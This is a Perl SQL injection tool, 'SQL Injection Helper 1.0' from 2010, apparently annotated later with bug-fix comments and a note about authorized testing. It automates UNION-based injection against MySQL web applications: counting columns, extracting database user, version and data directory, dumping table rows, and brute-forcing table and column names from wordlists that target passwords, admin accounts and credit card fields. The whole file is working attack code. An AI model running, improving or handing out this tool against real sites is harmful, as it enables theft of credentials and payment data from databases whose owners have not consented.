#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................................
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# ...............................................................
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sql.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# ...............................................................
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
use strict;
use warnings;
use LWP::UserAgent;
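# NOTE(review): this script sends attacker-controlled SQL fragments to a
# third-party web application. Run it only against systems you are explicitly
# authorized to test; everything it extracts is also written to log.txt.
print q {
+-------------------------------------------------------------+
| SQL Injection Helper 1.0 |
| |
| + Column Counter |
| + SQL Data Grabber |
| + Name Information-Fuzzer |
| |
| < j0k3 > (C) by fred777 |
+-------------------------------------------------------------+
}; $|++;   # unbuffered STDOUT so per-request progress shows immediately

# Shared state for the mode subs: -c/-d/-f switch, target URL, true-word (-c only).
our ($op,$url,$true) = @ARGV;
# Log file (current directory) and the row count used in "LIMIT offset,$lim" by -d.
our ($file,$lim) = ('log.txt',1000);
our $ua = LWP::UserAgent->new();
# LWP's default per-request timeout is 180 s; every mode loops over many
# requests, so a dead host would otherwise stall the run for minutes each.
$ua->timeout(30);
my $head =
    "+-------------------------------------------------------------+\n".
    "| j0k3 SQL Injection Helper - Logfile |\n".
    "+-------------------------------------------------------------+\n";

# Validate arguments before anything is logged. The previous checks matched
# undef against a regex when @ARGV was short, which only produced
# "uninitialized value" warnings before usage() ran.
usage() unless defined $op && $op =~ m/^-[dcf]$/i;
$op = lc $op;   # the switch was accepted case-insensitively but dispatched with eq
# https is accepted as well; it requires LWP::Protocol::https to be installed,
# otherwise LWP answers every request with an internal "501" response.
usage() unless defined $url && $url =~ m{^https?://}i;
writing($head);
order()   if $op eq '-c';
selects() if $op eq '-d';
fuzz()    if $op eq '-f';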
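sub order {
    # Column Counter (-c). Requests "$url ORDER BY n" for n = 1, 2, ... and takes
    # the first n whose page no longer contains the caller-supplied true-word
    # ($true) as one past the column count. Prints and logs the count plus a
    # ready-made "AND 1=0 UNION SELECT 1,2,...,n" template.
    error() if(!$true);

    # Hard ceiling: a page that always shows the true-word (errors suppressed,
    # true-word also present in static content) would otherwise loop forever.
    my $max_cols = 200;
    my $cols;
    for my $n (1 .. $max_cols) {
        my $resp = $ua->get("$url+ORDER+BY+$n--+");
        # get() never returns false, so the old 'or die "$!"' was dead code.
        # Transport failures come back as a synthetic response carrying this
        # header; without the check a refused connection was reported as a
        # column count.
        die "\nRequest failed: " . $resp->status_line . "\n"
            if ($resp->header('Client-Warning') || '') eq 'Internal response';
        # \Q...\E: the true-word is matched literally, not interpreted as a regex.
        if ($resp->content !~ m/\Q$true\E/i) {
            $cols = $n - 1;
            last;
        }
    }

    my $report;
    if (!defined $cols) {
        $report = "\nColumns: unknown (true-word still present at ORDER BY $max_cols)\n\n";
    }
    else {
        my $str = "$url+AND+1=0+UNION+SELECT+1";
        $str .= ",$_" for (2 .. $cols);
        $report = "\nColumns: $cols\nString: $str--+\n\n";
        # ORDER BY 1 is valid for any SELECT, so a count of 0 means the
        # true-word was never seen: the URL or the true-word is probably wrong.
        $report .= "Note: true-word absent even for ORDER BY 1 - check the URL / true-word\n\n"
            if $cols == 0;
    }
    print $report; writing($report);
    return;
}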
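sub selects {
    # SQL Data Grabber (-d). Two modes, chosen by the shape of $url:
    #   a) "...,j0k3" with no FROM clause: the marker is swapped for a
    #      CONCAT_WS() of user(), version() and @@datadir and the three values
    #      are printed.
    #   b) "...,j0k3(col1,col2)+from+table": the marker call is swapped for a
    #      CONCAT_WS() of the listed columns and rows are walked with
    #      "LIMIT <offset>,$lim" until the page stops showing a row.
    # Extracted values sit between 99999 markers so they can be located in the
    # HTML; the UNHEX(HEX()) wrapper is kept from the original.
    #
    # "from" is now matched case-insensitively in both branches; the first
    # branch used to be case-sensitive, so a URL with "FROM" took mode a).
    if ($url =~ m:j0k3: && $url !~ m:from:i) {
        my $inf  = 'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@@datadir,99999)))';
        my $st   = replace($url,'j0k3',$inf);
        my $resp = $ua->get("$st--+");
        # get() never returns false; transport failures are synthetic responses.
        die "\nRequest failed: " . $resp->status_line . "\n"
            if ($resp->header('Client-Warning') || '') eq 'Internal response';
        my $t;
        # Non-greedy groups: a greedy (.+) split a Windows @@datadir such as
        # C:\mysql\data\ on its drive-letter colon.
        if ($resp->content =~ m![9]{5}:(.+?):(.+?):(.+?):[9]{5}!i) {
            $t = "\nUrl: $url\n\nUser: $1\nMySQL Version: $2\nDirectory: $3\n\n";
        }
        else {
            # Previously $1..$3 were printed without checking the match
            # (undef, or stale captures from an earlier regex).
            $t = "\nUrl: $url\n\nNo 99999:...:99999 marker in the response (HTTP "
               . $resp->code . ")\n\n";
        }
        print $t; writing($t);
    }
    elsif ($url =~ m:from:i) {
        # Column list inside the marker call; error out if the call is missing
        # instead of using an undefined $1 as before.
        my ($cols) = $url =~ m:j0k3\((.+)\):;
        error() unless defined $cols;
        my $str = "UNHEX(HEX(CONCAT_WS(0x3a,99999,$cols,99999)))";
        # quotemeta: replace() treats its second argument as a regex, and a
        # column list containing its own parentheses (e.g. concat(a,b)) broke
        # the pattern when it was interpolated raw.
        my $st = replace($url, 'j0k3\(' . quotemeta($cols) . '\)', $str);
        print "\nDumping Information:\n\n"; writing("\nUrl: $st\n\nDumping Information:\n\n");

        my $c = 0;
        while (1) {
            my $resp = $ua->get("$st+LIMIT+$c,$lim--+");
            die "\nRequest failed: " . $resp->status_line . "\n"
                if ($resp->header('Client-Warning') || '') eq 'Internal response';
            my $body = $resp->content;
            # Greedy capture, as before: if the application renders several
            # result rows at once they are reported joined into one line.
            my ($row) = $body =~ m![9]{5}:(.*):[9]{5}!;
            if (!defined $row) {
                # The old loop printed "[$c] $1" here with a stale $1, i.e. the
                # last real row appeared twice at the end of every dump.
                my $t = "[$c] (no row - end of data or marker not rendered)\n";
                print $t; writing($t);
                last;
            }
            print "[$c] $row\n"; writing("[$c] $row\n");
            last if $row eq '';   # an empty row ended the original loop too
            if ($body =~ m:error:i) {
                # Heuristic carried over from the original: any "error" on the
                # page stops the walk, including when the word came from the
                # row data or static page text - the dump is then incomplete.
                my $t = "(stopped: response contains \"error\")\n";
                print $t; writing($t);
                last;
            }
            $c++;
        }
    }
    else {
        error();
    }
    return;
}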
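sub fuzz {
    # Name Information Fuzzer (-f). $url must carry a "j0k3" marker inside a
    # working UNION SELECT. For every candidate table the marker is replaced by
    # 99999 and "FROM <table>" is appended; tables whose page shows the marker
    # (and no "error") are then probed column by column with
    # CONCAT(99999,0x3a,<column>) ... LIMIT 0,1. Hits are printed and logged.
    #
    # Caveats carried over from the original wordlists:
    #  - some names are SQL reserved words ("group", "order", "table", "index")
    #    or contain spaces/hyphens ("Total Members", "e-mail"); those requests
    #    produce SQL errors and can never match.
    #  - the "error" heuristic also rejects pages that merely contain the word.
    # Wordlist credit: darkc0de (see the file header).
    my @tables =(
        'user','admin','users','admins','account','accounts','adm','admin_login',
        'member','memberlist','members','login_admin','login_admins','login_user',
        'login_users','logins','logon','logs','admin_user','admin_userinfo','administer',
        'administrable','administrate','administration','administrator','administrators',
        'adminrights','adminuser','login','mambo_session','mambo_users','manage','Logins',
        'manager','mb_users','mybb_users','e107.e107_user','e107_user','Admins','Login',
        'phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users',
        'tbladmins','sort','_wfspro_admin','4images_users','a_admin','art','article_admin',
        'articles','artikel','aut','author','autore','backend','backend_users','backenduser',
        'chat_config','chat_messages','chat_users','client','clients','clubconfig',
        'company','config','contact','contacts','content', 'control','cpg_config',
        'cpg132_users','customer','customers','customers_basket','dbadmins','dealer',
        'dealers','diary','download','forum.ibf_members','fusion_user_groups',
        'fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings',
        'ibf_members','ibf_members_converge','ibf_sessions','icq','images','index',
        'info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users',
        'jos_comprofiler_members','jos_contact_details','jos_joomblog_users',
        'jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici',
        'kpro_adminlogs','kpro_user','links','lost_pass','lost_passwords','movie','movies',
        'lostpass','lostpasswords','m_admin','main','minibbtable_users','mitglieder',
        'mysql','mysql.user','name','names','news','news_lostpass','newsletter',
        'nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users',
        'obb_profiles','order','orders','parol','partner','partners','passes','password',
        'passwords','perdorues','perdoruesit','phorum_session','phorum_user',
        'phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user',
        'punbb_users','pwd','pwds','reg_user','reg_users','registered','reguser','regusers',
        'session','sessions','settings','shop.cards','shop.orders','site_login',
        'site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members',
        'SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser',
        'sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member',
        'tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user',
        'tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test',
        'usebb_members','user_admin','user_info','user_list','user_login','user_logins',
        'user_names','usercontrol','userinfo','userlist','userlogins','username','usernames',
        'userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members',
        'webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin',
        'xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ActiveDataFeed',
        'Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1',
        'DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties',
        'Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre',
        'JamPass','MyTicketek','MyTicketekArchive','News','Promotion','Region',
        'SearchOptions','Series','Sheldonshows','StateList','States','SubCategory',
        'Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent',
        'sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows',
        'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences',
        'uvw_Category','uvw_Preferences','Venue','venues','VenuesNew','stone list',
        'tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor',
        'tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory',
        'tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList',
        'viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info',
        'CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name',
        'jos_user','table_user','email','mail','bulletin','cc_info','login_name',
        'admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin',
    );
    # 'cvvnumber]' (a typo with a stray bracket, 'cvvnumber' is listed already)
    # was removed: it produced a SQL syntax error on every table scanned.
    my @columns = (
        'user','name','username','password','passwd','pass','benutzername','passwort',
        'cc_number','id','email','pwd','user_name','customers_email_address',
        'customers_password','user_password','user_pass','admin_user','admin_password',
        'admin_pass','usern','user_n','username1','password1','email1','id1',
        'users','login','logins','login_user','login_admin','login_username','user_username',
        'user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid',
        'admin_userid','adminusername','admin_username','adminname','admin_name',
        'usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid',
        'userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user',
        'wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria',
        'kodi','emer','ime','korisnik','korisnici','user1','administrator','text',
        'administrator_name','mem_login','login_password','login_pass','login_passwd',
        'login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w',
        'user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin',
        'user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password',
        'memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass',
        'mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username',
        'my_name','my_password','my_email','cvvnumber','about','access','accnt',
        'accnts','account','accounts','admin','adminemail','adminlogin','adminmail',
        'admins','aid','aim','auth','authenticate','authentication','blog','cc_expires',
        'cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername',
        'conf','config','contact','converge_pass_hash','converge_pass_salt','crack',
        'customer','customers','data','db_database_name','db_hostname',
        'db_password','db_username','download','e-mail','emailaddress','full','gid',
        'group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group',
        'id_member','images','index','ip_address','last_ip','last_login','lastname',
        'log','login_name','login_pw','loginkey','loginout','logo','md5hash','member',
        'member_id','member_login_key','member_name','memberid','membername','members',
        'new','news','nick','number','nummer','pass_hash','passwordsalt','passwort',
        'personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer',
        'secretquestion','serial','session_member_id','session_member_login_key','sesskey',
        'setting','sid','spacer','status','store','store1','store2','store3','store4',
        'table_prefix','temp_pass','temp_password','temppass','temppasword','text','un',
        'user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword',
        'user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm',
        'userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name',
        'xar_pass');

    # Both lists contain repeats ("users", "text", "passwort", ...); probe each
    # name once so the scan does not send (and log) duplicate requests.
    my %seen;
    my @uniq_tables  = grep { !$seen{$_}++ } @tables;
    %seen = ();
    my @uniq_columns = grep { !$seen{$_}++ } @columns;

    print "\nUrl: $url\n"; writing("\nUrl: $url\n");
    print "\nScanning Tables:\n"; writing("\nScanning Tables:\n");
    # Loop-invariant: the table probe only differs in the FROM clause.
    my $table_probe = replace($url,'j0k3','99999');
    foreach my $tab (@uniq_tables) {
        my $resp = $ua->get("$table_probe+FROM+$tab--+");
        # Transport failure (synthetic LWP response): report it and keep going
        # rather than silently treating the table as absent.
        if (($resp->header('Client-Warning') || '') eq 'Internal response') {
            print "! $tab: " . $resp->status_line . "\n";
            next;
        }
        # "[^,]99999": ignore the ",99999" echoed back from the request URL.
        next unless $resp->content =~ m:[^,][9]{5}: && $resp->content !~ m:error:i;
        print "+ $tab -> Scanning Columns:\n";
        writing("+ $tab -> Scanning Columns:\n");
        foreach my $col (@uniq_columns) {
            my $col_probe = replace($url,'j0k3',"CONCAT(99999,0x3a,$col)");
            $resp = $ua->get("$col_probe+FROM+$tab+LIMIT+0,1--+");
            # "[^(]99999": ignore the "CONCAT(99999" echoed back from the URL.
            if ($resp->content =~ m:[^(][9]{5}: && $resp->content !~ m:error:i) {
                print "- $col\n"; writing("- $col\n");
            }
        }
    }
    return;
}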
sub replace {
    # Returns a copy of $str in which the FIRST match of $or is replaced by the
    # text $re; the caller's string is left untouched. $or is used as a regex,
    # not a plain string - callers pass escaped parentheses ('j0k3\(...\)') and
    # rely on that. $re is inserted as-is (no further interpolation).
    my ($text, $pattern, $subst) = @_;
    my $out = $text;
    $out =~ s/$pattern/$subst/;
    return $out;
}
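sub writing {
    # Appends $text to the log file named by the global $file (default
    # "log.txt" in the current directory). Dies if the file cannot be opened
    # or flushed. The log collects everything the tool extracts - including
    # any credentials pulled with -d - so it is created owner-only where the
    # platform honours file modes; treat it as engagement evidence.
    my $text = shift;
    # Three-argument open with a lexical handle: the old two-argument form
    # would have interpreted mode characters inside $file.
    open my $fh, '>>', $file or die "\nopen $file: $!\n";
    chmod 0600, $file;   # best effort; ignored where modes do not apply
    print {$fh} $text;
    # Buffered write errors only surface at close, so check it too.
    close $fh or die "\nclose $file: $!\n";
    return;
}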
sub error {
    # Prints a boxed "read the usage" message and terminates the script.
    # Reached when a mode is given a URL of the wrong shape, or -c is run
    # without its true-word.
    print <<'END_ERROR';
+-------------------------------------------------------------+
| Error: Read Usage! - $ perl sql.pl |
+-------------------------------------------------------------+
END_ERROR
    exit;
}
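sub usage {
    # Prints the command-line reference and exits. Fix: the second -d example
    # read "j0ke(column1,column2)", but selects() only recognises the "j0k3("
    # marker, so copying that example produced a usage error; the -f lines also
    # gained the "$ perl" shell-prompt spacing used by every other example.
    print q {
+-------------------------------------------------------------+
| INFORMATION |
+-------------------------------------------------------------+
| |
| Column Counter: |
| $ perl sql.pl -c <url> <true-word> |
| $ perl sql.pl -c http://seite.de/?id=7 j0k3 |
| |
| SQL Data Grabber: |
| $ perl sql.pl -d <url> |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select+1, |
| j0k3(column1,column2)+from+table |
| |
| Name Information Fuzzer: |
| $ perl sql.pl -f <url> |
| $ perl sql.pl -f http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| |
| < j0k3 > |
+-------------------------------------------------------------+
}; exit;
}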
# EOF - < j0k3 > - > 06.2010 - version 1.0